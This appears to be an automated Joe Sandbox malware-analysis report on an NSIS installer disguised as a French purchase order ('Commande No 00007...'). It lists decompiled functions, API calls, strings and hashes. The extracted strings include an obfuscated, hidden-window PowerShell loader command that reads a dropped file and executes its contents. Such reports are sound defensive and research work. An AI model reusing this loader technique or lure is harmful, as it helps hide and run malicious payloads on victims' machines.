                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(?,00421530,004210E8,0040589F,004210E8,004210E8,00000000,004210E8,004210E8,?,?,76232EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405FED
                                                        • FindClose.KERNEL32(00000000), ref: 00405FF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                        • Instruction ID: 3600370175755c1184b2d23a4f6bb82519631065e8d036e0b8342efe42824015
                                                        • Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                        • Instruction Fuzzy Hash: EBD0123295D1306BD3115778BD0C84BBA589F55334B528A73B466F22F0D7349C6286EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403AF9 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 164 403af9-403b0b 165 403b11-403b17 164->165 166 403c4c-403c5b 164->166 165->166 167 403b1d-403b26 165->167 168 403caa-403cbf 166->168 169 403c5d-403ca5 GetDlgItem * 2 call 403fcc SetClassLongA call 40140b 166->169 170 403b28-403b35 SetWindowPos 167->170 171 403b3b-403b3e 167->171 173 403cc1-403cc4 168->173 174 403cff-403d04 call 404018 168->174 169->168 170->171 175 403b40-403b52 ShowWindow 171->175 176 403b58-403b5e 171->176 178 403cc6-403cd1 call 401389 173->178 179 403cf7-403cf9 173->179 181 403d09-403d24 174->181 175->176 182 403b60-403b75 DestroyWindow 176->182 183 403b7a-403b7d 176->183 178->179 201 403cd3-403cf2 SendMessageA 178->201 179->174 186 403f99 179->186 187 403d26-403d28 call 40140b 181->187 188 403d2d-403d33 181->188 190 403f76-403f7c 182->190 192 403b90-403b96 183->192 193 403b7f-403b8b SetWindowLongA 183->193 189 403f9b-403fa2 186->189 187->188 197 403f57-403f70 DestroyWindow EndDialog 188->197 198 403d39-403d44 188->198 190->186 195 403f7e-403f84 190->195 199 403c39-403c47 call 404033 192->199 200 403b9c-403bad GetDlgItem 192->200 193->189 195->186 202 403f86-403f8f ShowWindow 195->202 197->190 198->197 203 403d4a-403d97 call 405d00 call 403fcc * 3 GetDlgItem 198->203 199->189 204 403bcc-403bcf 200->204 205 403baf-403bc6 SendMessageA IsWindowEnabled 200->205 201->189 202->186 234 403da1-403ddd ShowWindow KiUserCallbackDispatcher call 403fee EnableWindow 203->234 235 403d99-403d9e 203->235 209 403bd1-403bd2 204->209 210 403bd4-403bd7 204->210 205->186 205->204 212 403c02-403c07 call 403fa5 209->212 213 403be5-403bea 210->213 214 403bd9-403bdf 210->214 212->199 215 403c20-403c33 SendMessageA 213->215 216 403bec-403bf2 213->216 214->215 219 403be1-403be3 214->219 215->199 220 403bf4-403bfa call 40140b 216->220 221 403c09-403c12 call 40140b 216->221 219->212 230 403c00 220->230 221->199 231 403c14-403c1e 221->231 230->212 231->230 238 403de2 234->238 239 403ddf-403de0 234->239 235->234 240 403de4-403e12 GetSystemMenu EnableMenuItem SendMessageA 238->240 239->240 241 403e14-403e25 SendMessageA 240->241 242 403e27 240->242 243 403e2d-403e66 call 404001 call 405cde lstrlenA call 405d00 SetWindowTextA call 401389 241->243 242->243 243->181 252 403e6c-403e6e 243->252 252->181 253 403e74-403e78 252->253 254 403e97-403eab DestroyWindow 253->254 255 403e7a-403e80 253->255 254->190 257 403eb1-403ede CreateDialogParamA 254->257 255->186 256 403e86-403e8c 255->256 256->181 258 403e92 256->258 257->190 259 403ee4-403f3b call 403fcc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 257->259 258->186 259->186 264 403f3d-403f50 ShowWindow call 404018 259->264 266 403f55 264->266 266->190
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B35
                                                        • ShowWindow.USER32(?), ref: 00403B52
                                                        • DestroyWindow.USER32 ref: 00403B66
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B82
                                                        • GetDlgItem.USER32(?,?), ref: 00403BA3
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB7
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403BBE
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403C6C
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403C76
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403C90
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CE1
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403D87
                                                        • ShowWindow.USER32(00000000,?), ref: 00403DA8
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DBA
                                                        • EnableWindow.USER32(?,?), ref: 00403DD5
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DEB
                                                        • EnableMenuItem.USER32(00000000), ref: 00403DF2
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E0A
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1D
                                                        • lstrlenA.KERNEL32(Stedtillgs Setup: Completed,?,Stedtillgs Setup: Completed,Stedtillgs Setup), ref: 00403E46
                                                        • SetWindowTextA.USER32(?,Stedtillgs Setup: Completed), ref: 00403E55
                                                        • ShowWindow.USER32(?,0000000A), ref: 00403F89
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: Stedtillgs Setup$Stedtillgs Setup: Completed
                                                        • API String ID: 3282139019-1160849601
                                                        • Opcode ID: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                        • Instruction ID: d55a176a90e8b499f18b63baceb11f369ce23e9a5aae2cf9a731fb05d42b674d
                                                        • Opcode Fuzzy Hash: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                        • Instruction Fuzzy Hash: 20C1C271A04205BBDB206F61ED49E2B3E7CFB4470AF41443EF601B12E1C779A942AB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403767 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 403767-40377f call 406009 270 403781-403791 call 405c3c 267->270 271 403793-4037c4 call 405bc5 267->271 279 4037e7-403810 call 403a2c call 40585c 270->279 275 4037c6-4037d7 call 405bc5 271->275 276 4037dc-4037e2 lstrcatA 271->276 275->276 276->279 285 403816-40381b 279->285 286 403897-40389f call 40585c 279->286 285->286 287 40381d-403841 call 405bc5 285->287 291 4038a1-4038a8 call 405d00 286->291 292 4038ad-4038d2 LoadImageA 286->292 287->286 297 403843-403845 287->297 291->292 295 403953-40395b call 40140b 292->295 296 4038d4-403904 RegisterClassA 292->296 310 403965-403970 call 403a2c 295->310 311 40395d-403960 295->311 300 403a22 296->300 301 40390a-40394e SystemParametersInfoA CreateWindowExA 296->301 298 403856-403862 lstrlenA 297->298 299 403847-403854 call 405799 297->299 304 403864-403872 lstrcmpiA 298->304 305 40388a-403892 call 40576e call 405cde 298->305 299->298 307 403a24-403a2b 300->307 301->295 304->305 309 403874-40387e GetFileAttributesA 304->309 305->286 313 403880-403882 309->313 314 403884-403885 call 4057b5 309->314 320 403976-403993 ShowWindow LoadLibraryA 310->320 321 4039f9-4039fa call 40509b 310->321 311->307 313->305 313->314 314->305 323 403995-40399a LoadLibraryA 320->323 324 40399c-4039ae GetClassInfoA 320->324 325 4039ff-403a01 321->325 323->324 326 4039b0-4039c0 GetClassInfoA RegisterClassA 324->326 327 4039c6-4039e9 DialogBoxParamA call 40140b 324->327 329 403a03-403a09 325->329 330 403a1b-403a1d call 40140b 325->330 326->327 331 4039ee-4039f7 call 4036b7 327->331 329->311 332 403a0f-403a16 call 40140b 329->332 330->300 331->307 332->311
                                                        APIs
                                                          • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                          • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                          • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        • lstrcatA.KERNEL32(1033,Stedtillgs Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stedtillgs Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233410,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000), ref: 004037E2
                                                        • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168,1033,Stedtillgs Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stedtillgs Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403857
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386A
                                                        • GetFileAttributesA.KERNEL32(: Completed), ref: 00403875
                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168), ref: 004038BE
                                                          • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                        • RegisterClassA.USER32(00422E80), ref: 004038FB
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403913
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403948
                                                        • ShowWindow.USER32(00000005,00000000), ref: 0040397E
                                                        • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040398F
                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399A
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AA
                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B7
                                                        • RegisterClassA.USER32(00422E80), ref: 004039C0
                                                        • DialogBoxParamA.USER32(?,00000000,00403AF9,00000000), ref: 004039DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Stedtillgs Setup: Completed$_Nb
                                                        • API String ID: 914957316-794890973
                                                        • Opcode ID: adef497c8dc9a51a072c8d1473dc94786368c7830bc24f3a940699fd44d0c710
                                                        • Instruction ID: f2042b1b728b60748b23566834e767a2e9ab566c559d5d3ffbf72b6bfa23c0d9
                                                        • Opcode Fuzzy Hash: adef497c8dc9a51a072c8d1473dc94786368c7830bc24f3a940699fd44d0c710
                                                        • Instruction Fuzzy Hash: 4861E4716442007EE320AF659D45F2B3EACEB4474AF40457FF940B22E2D7BD6D029A2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402C79 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 338 402c79-402cc7 GetTickCount GetModuleFileNameA call 40596f 341 402cd3-402d01 call 405cde call 4057b5 call 405cde GetFileSize 338->341 342 402cc9-402cce 338->342 350 402df1-402dff call 402bda 341->350 351 402d07-402d1e 341->351 343 402f18-402f1c 342->343 357 402ed0-402ed5 350->357 358 402e05-402e08 350->358 353 402d20 351->353 354 402d22-402d2f call 4031b6 351->354 353->354 360 402d35-402d3b 354->360 361 402e8c-402e94 call 402bda 354->361 357->343 362 402e34-402e80 GlobalAlloc call 4060e9 call 40599e CreateFileA 358->362 363 402e0a-402e22 call 4031cc call 4031b6 358->363 364 402dbb-402dbf 360->364 365 402d3d-402d55 call 40592a 360->365 361->357 388 402e82-402e87 362->388 389 402e96-402ec6 call 4031cc call 402f1f 362->389 363->357 390 402e28-402e2e 363->390 373 402dc1-402dc7 call 402bda 364->373 374 402dc8-402dce 364->374 365->374 383 402d57-402d5e 365->383 373->374 375 402dd0-402dde call 40607b 374->375 376 402de1-402deb 374->376 375->376 376->350 376->351 383->374 387 402d60-402d67 383->387 387->374 391 402d69-402d70 387->391 388->343 398 402ecb-402ece 389->398 390->357 390->362 391->374 393 402d72-402d79 391->393 393->374 395 402d7b-402d9b 393->395 395->357 397 402da1-402da5 395->397 399 402da7-402dab 397->399 400 402dad-402db5 397->400 398->357 401 402ed7-402ee8 398->401 399->350 399->400 400->374 404 402db7-402db9 400->404 402 402ef0-402ef5 401->402 403 402eea 401->403 405 402ef6-402efc 402->405 403->402 404->374 405->405 406 402efe-402f16 call 40592a 405->406 406->343
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402C8D
                                                        • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,00000400), ref: 00402CA9
                                                          • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                          • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        • GetFileSize.KERNEL32(00000000,00000000,Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00402CF2
                                                        • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E39
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 00402C79
                                                        • Null, xrefs: 00402D72
                                                        • soft, xrefs: 00402D69
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                        • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                                        • Inst, xrefs: 00402D60
                                                        • Error launching installer, xrefs: 00402CC9
                                                        • C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                                        • Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, xrefs: 00402CE6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                        • API String ID: 2803837635-21818012
                                                        • Opcode ID: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                        • Instruction ID: f333638810b0fcdd6804239d6ce5d4266c39632cb53516581565939923b004a1
                                                        • Opcode Fuzzy Hash: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                        • Instruction Fuzzy Hash: BA61E271A40205ABDB21AF64DE89F9A76B8EB00315F20413BF504F72C1D7BC9D409B9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040173F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,00000031), ref: 0040177E
                                                        • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)","powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,00000031), ref: 004017A8
                                                          • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Stedtillgs Setup,NSIS Error), ref: 00405CEB
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine$C:\Users\user\Music\magmaen.Pre
                                                        • API String ID: 1941528284-3985162459
                                                        • Opcode ID: 02128d24ded24020bf6e5f8c3e01999db9f63b98e863a3a1a5a250ba017e94e2
                                                        • Instruction ID: 7db23f1b7129aac0a780206d539a17182f36eced295e71d03ce013e672f77a8a
                                                        • Opcode Fuzzy Hash: 02128d24ded24020bf6e5f8c3e01999db9f63b98e863a3a1a5a250ba017e94e2
                                                        • Instruction Fuzzy Hash: 3241E471904615BADB10BBA9DD46EAF3679EF01328F30823BF111F20E1D67C8A419A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404FC9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 404fc9-404fde 539 405094-405098 538->539 540 404fe4-404ff6 538->540 541 405001-40500d lstrlenA 540->541 542 404ff8-404ffc call 405d00 540->542 544 40502a-40502e 541->544 545 40500f-40501f lstrlenA 541->545 542->541 547 405030-405037 SetWindowTextA 544->547 548 40503d-405041 544->548 545->539 546 405021-405025 lstrcatA 545->546 546->544 547->548 549 405043-405085 SendMessageA * 3 548->549 550 405087-405089 548->550 549->550 550->539 551 40508b-40508e 550->551 551->539
                                                        APIs
                                                        • lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                        • lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                        • lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                        • SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Completed
                                                        • API String ID: 2531174081-3087654605
                                                        • Opcode ID: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                        • Instruction ID: e00d580e889cbc391bca3c98a7377c16a9d81c786260b2fa8fb0dbec0f6b8e5c
                                                        • Opcode Fuzzy Hash: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                        • Instruction Fuzzy Hash: 9F218C71900508BADF119FA9CD84ADFBFA9FF04354F14807AF948A6290C3798E419FA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

